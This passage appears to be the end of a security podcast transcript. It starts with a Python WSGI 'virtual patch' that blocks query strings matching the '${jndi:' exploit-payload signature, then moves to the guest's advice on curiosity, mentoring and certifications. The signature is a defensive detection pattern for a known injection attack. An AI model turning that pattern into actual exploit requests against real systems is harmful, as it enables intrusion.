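# Hypothetical signature for a known exploit payload in a query string.
EXPLOIT_SIGNATURE = re.compile(r"\$\{jndi:", re.IGNORECASE)

def virtual_patch(app):
    """Wrap a WSGI app and reject requests whose query string matches the signature."""
    def guarded(environ, start_response):
        if EXPLOIT_SIGNATURE.search(environ.get("QUERY_STRING", "")):
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"Request blocked by virtual patch"]
        return app(environ, start_response)
    return guarded

def demo_app(environ, start_response):
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"Hello from the protected app"]

if __name__ == "__main__":
    with make_server("127.0.0.1", 8000, virtual_patch(demo_app)) as server:
        server.serve_forever()
```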

Henry Suryawirawan: Thanks for the plug for runtime protection, the WAF, and all these things. I think that can sometimes be very useful, especially if you are being attacked. DDoS, for example, where suddenly somebody from the internet just targets your system. So having this kind of runtime protection is definitely very useful. If you don’t have it, please implement it as soon as possible.

[00:44:59] 3 Tech Lead Wisdom

Henry Suryawirawan: So, Derek, it’s been a great conversation. Learning about security is very exciting as well. Unfortunately, we’ve reached the end of our conversation. But I have one last question that I normally ask all my guests, which I call the three technical leadership wisdom. Think of it just like advice that you wanna give to the listeners here. Maybe you can share with us your version of the three technical leadership wisdom.

Derek Fisher: Yeah. I think one is stay curious. One thing with technology is that it’s always changing, right? A prime example: everyone’s on the AI train right now, where it’s everywhere, it’s inescapable, and everyone’s trying to figure out what to do with it. It’s just a prime example of how things change. And I think there’s a lot of people trying to figure out, is this a danger or is this gonna be helpful? I think there are pluses and minuses, two sides to that. Again, it’s an example of how technology’s always changing. One of the things with application security in general, or more specifically, is that we have to stay up to speed with what development’s doing. The things that we were doing five years ago are vastly different than what we’re doing today. So you have to stay curious, stay engaged, and know where the technology is heading.

I think the other thing is be a mentor if you can, or be able to help others. Again, especially in this space with security. Henry, you mentioned earlier about how there’s a lot of openings in security and we’re having trouble filling them. And I think we need help in this space. We definitely need people that want to get into security. And I think being able to help mentor people and be able to bring them into this space is gonna help all of us. So find somebody that might be interested in security and try to help them along the way.

I guess the last point I would make is, and I know we kind of touched on the same thing in terms of hiring and staffing, but certifications aren’t always the answer. I know that I could probably sit down today and take many of these certification tests and pass them without studying. That doesn’t mean that I’ve achieved anything, right? I’m not saying certifications are wrong or anything like that, because there’s definitely value in certifications. I know a lot of organizations look specifically for certifications to make a hiring decision.

But what I’ve often found is that I like studying for certifications, whether I take the exam or not, because I tend to learn from that. I think especially in this space, we see a lot of people that just want to get into security and the first question is, which certification should I take? And it’s like, well, you don’t necessarily have to get a certification in order to get in this space. I mean, you need to know something, right?

So start dabbling, start getting involved. When you’re looking at application security specifically, start understanding how software is developed. Start understanding about CI/CD pipelines and integrating tools and how code gets delivered and deployed and maintained. If you’re looking into getting into other aspects of security, you know, start understanding those different corners and really, really understand it. Not just understand it enough to pass an exam. So that’s my advice.

Henry Suryawirawan: Right. Thank you for including the certifications. Now that you mention it, I’m very aware that a lot of people in the security space want to collect so-called certifications. There are so many security organizations and things like that, and people tend to chase these certifications. But like you mentioned, it’s always about the practicality. It’s not just the knowledge; you can accumulate all this knowledge, but the practicality, I think, is the most important: how do you actually deal with a security vulnerability, or even prevent it in the development lifecycle?

So Derek, if people enjoy this conversation and want to learn from you, maybe the Derek Maturity Model, is there a place where they can find you online?

Derek Fisher: Yeah, I try to stay pretty active on LinkedIn. Like I said, I stay pretty busy, but I try to get on LinkedIn and post and things like that. And I’ve been creating some content that I’ve been releasing; anybody that’s been following me on LinkedIn will see that. But yeah, the best way to get ahold of me is on LinkedIn.

Henry Suryawirawan: I’ve seen some of your YouTube videos; I think they’re really cool and fun. So yeah, maybe people should check those out as well.

So thank you again, Derek, for this opportunity. I really learned a lot about security from the conversation today, and I hope people do as well. So thank you for that.

Derek Fisher: Thank you.

– End –